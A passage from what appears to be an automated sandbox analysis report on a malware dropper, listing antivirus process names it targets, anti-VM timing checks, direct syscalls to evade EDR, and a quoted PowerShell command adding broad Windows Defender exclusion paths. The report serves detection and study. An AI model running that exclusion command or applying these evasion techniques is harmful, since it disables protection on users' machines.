NTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKAVSERVICE.EXEBKA

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\setup.ic19.exe	RDTSC instruction interceptor: First address: 1400010AA second address: 1400010BA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c fldpi 0x0000000e frndint 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.ic19.exe	RDTSC instruction interceptor: First address: 1400010BA second address: 1400010BA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a sub eax, ecx 0x0000000c dec ecx 0x0000000d cmp eax, ecx 0x0000000f jc 00007F1C013F153Dh 0x00000011 fldpi 0x00000013 frndint 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.ic19.exe	RDTSC instruction interceptor: First address: 1F8965 second address: 1F8973 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	RDTSC instruction interceptor: First address: 5ECA85 second address: 5ECA93 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_02FF8E3A rdtsc

7_2_02FF8E3A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Window / User API: threadDelayed 4576	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Window / User API: threadDelayed 4057	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3308	Jump to behavior

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_7-54174

Source: C:\Users\user\Desktop\setup.ic19.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Atrebution.sys

Jump to dropped file

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess			graph_7-54186
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_7-54186

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_4-7681
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_9-3231
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_4-7830

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

API coverage: 0.4 %

Source: C:\Users\user\AppData\Roaming\8AfroU.exe TID: 3868	Thread sleep count: 4576 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe TID: 3868	Thread sleep time: -9152000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe TID: 4388	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe TID: 3868	Thread sleep count: 4057 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe TID: 3868	Thread sleep time: -8114000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe TID: 4388	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe TID: 5700	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe TID: 6148	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe TID: 6180	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe TID: 6192	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe TID: 7092	Thread sleep count: 241 > 30	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe TID: 7092	Thread sleep time: -241000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe TID: 7096	Thread sleep count: 84 > 30	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe TID: 7096	Thread sleep time: -42000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe TID: 2596	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe TID: 1144	Thread sleep count: 54 > 30	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe TID: 6192	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 744	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_100040C1 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

7_2_100040C1

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

Code function: 4_2_00410C70 VirtualQuery,GetSystemInfo,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,

4_2_00410C70

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: lXAMaI.exe, 00000007.00000002.3502823696.0000000000731000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*
Source: setup.ic19.exe, 00000000.00000003.1900207800.0000000000611000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.0000000000611000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: lXAMaI.exe, 00000007.00000002.3502823696.00000000006F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	API call chain: ExitProcess graph end node	graph_4-7831
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API call chain: ExitProcess graph end node	graph_7-54224
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API call chain: ExitProcess graph end node	graph_7-54182
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	API call chain: ExitProcess graph end node	graph_7-54274

Source: C:\Users\user\Desktop\setup.ic19.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_02FF8E3A rdtsc

7_2_02FF8E3A

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

Code function: 4_2_0040B685 NtAllocateVirtualMemory,LdrLoadDll,

4_2_0040B685

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_004310CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_004310CC

Source: C:\Users\user\AppData\Roaming\8AfroU.exe

Code function: 4_2_004045D8 LoadLibraryA,GetProcAddress,FreeLibrary,SysFreeString,

4_2_004045D8

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_3_02400643 mov eax, dword ptr fs:[00000030h]	7_3_02400643
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_3_02400643 mov eax, dword ptr fs:[00000030h]	7_3_02400643
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_3_024000CD mov eax, dword ptr fs:[00000030h]	7_3_024000CD
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_3_024000CD mov eax, dword ptr fs:[00000030h]	7_3_024000CD
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_3_02400643 mov eax, dword ptr fs:[00000030h]	7_3_02400643
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_3_02400643 mov eax, dword ptr fs:[00000030h]	7_3_02400643
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_3_024000CD mov eax, dword ptr fs:[00000030h]	7_3_024000CD
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_3_024000CD mov eax, dword ptr fs:[00000030h]	7_3_024000CD
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_00410335 mov eax, dword ptr fs:[00000030h]	7_2_00410335

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_035AAC3B GetProcessHeap,

7_2_035AAC3B

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_00408550 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00408550
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_0040FE40 SetUnhandledExceptionFilter,	4_2_0040FE40
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4_2_0040FE20 SetUnhandledExceptionFilter,	4_2_0040FE20
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_004310CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_004310CC
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_00432AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00432AE2
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_004351FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_004351FB
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_035A1B13 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_035A1B13
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_035A73D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_035A73D6
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_035A1640 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_035A1640
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_03601B13 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_03601B13
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_036073D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_036073D6
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_03601640 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_03601640
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_100153B0 SetUnhandledExceptionFilter,	7_2_100153B0
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: 7_2_100153C2 SetUnhandledExceptionFilter,	7_2_100153C2
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Code function: 9_2_004210CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_004210CC
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Code function: 9_2_00422AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00422AE2
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Code function: 9_2_004251FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_004251FB

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB481B8E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB71738D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB4263B9	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB6D93E9	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB4811BC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB6E780A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB6A3231	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB4CC224	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Indirect: 0x2BB626C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB710847	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB6B020F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB4113DA	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB6E9CFA	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB4388EC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB6F8B4D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB471862	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB451559	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB430626	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB46B67D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Indirect: 0x7FFDFB407278	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB47185B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtAllocateVirtualMemory: Indirect: 0x40B9C0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	NtProtectVirtualMemory: Direct from: 0x7FFDFB416AAD	Jump to behavior

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe

7_2_10004DFC

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Process created: C:\Program Files (x86)\lXAMaI\lXAMaI.exe "C:\Program Files (x86)\lXAMaI\lXAMaI.exe"			Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force			Jump to behavior

Source: setup.ic19.exe	Binary or memory string: tcpudp%u65535\wship6\ws2_32freeaddrinfogetnameinfogetaddrinfo127.0.0.1GradientFillmsimg32.dllSHAppBarMessageShell_TrayWndGetMonitorInfoWMonitorFromRectUser32.DLLPlaySoundWWinmm.DLLWindowsLogonWindowsLogoff(
Source: setup.ic19.exe, 00000000.00000003.1900287688.0000000002C21000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900573212.0000000002C21000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900501095.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: setup.ic19.exe	Binary or memory string: Tray Icon process will now exit.MThe Tray Icon was unable to communicate with the System Tray (Shell_TrayWnd).
Source: setup.ic19.exe, 00000000.00000003.1900287688.0000000002C21000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900573212.0000000002C21000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900501095.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_035A1CD8 cpuid

7_2_035A1CD8

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: GetLocaleInfoA,	4_2_00410E10
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Code function: GetLocaleInfoA,	7_2_00436B1A
Source: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe	Code function: GetLocaleInfoA,	9_2_00426B1A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
